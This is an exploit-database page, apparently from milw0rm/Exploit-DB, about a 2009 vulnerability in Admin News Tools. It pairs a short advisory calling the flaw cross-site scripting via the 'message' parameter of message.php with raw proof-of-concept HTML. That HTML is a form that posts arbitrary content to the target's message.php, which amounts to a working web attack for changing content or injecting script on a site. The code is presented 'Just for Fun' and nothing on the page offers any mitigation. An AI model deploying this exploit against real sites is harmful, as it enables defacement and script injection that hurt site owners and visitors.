header-logo
Suggest Exploit
vendor:
Admin News Tools
by:
milw0rm.com
8,8
CVSS
HIGH
Remote Contents Change Vulnerability
79
CWE
Product Name: Admin News Tools
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Admin News Tools Remote Contents Change Vulnerability

A vulnerability exists in Admin News Tools, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the 'message' parameter to 'message.php' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

<html>
<!-- Securitylab.ir , info@securitylab.ir -->
<head>
</head>
<body>
<center>
<center>
<p><b><font size="+2">Admin News Tools<i> </i></font><font size="2">Remote
Contents Change Vulnerability</font></b></p>
</center>
<form action="http://site.com/news/system/message.php" method="post">
  <div><br>
  <textarea cols="89" rows="12" name="message">&lt;/textarea&gt;
  <p>
  <input value="Send"
 onclick="this.setAttribute('value','...');"
 type="submit"></p>
  </div>
  <p>Just for Fun
  </p>
  <p></p>
</form>
</center>
</body>
</html>

# milw0rm.com [2009-07-15]

Navigation

Suggest Exploit

Services By CQR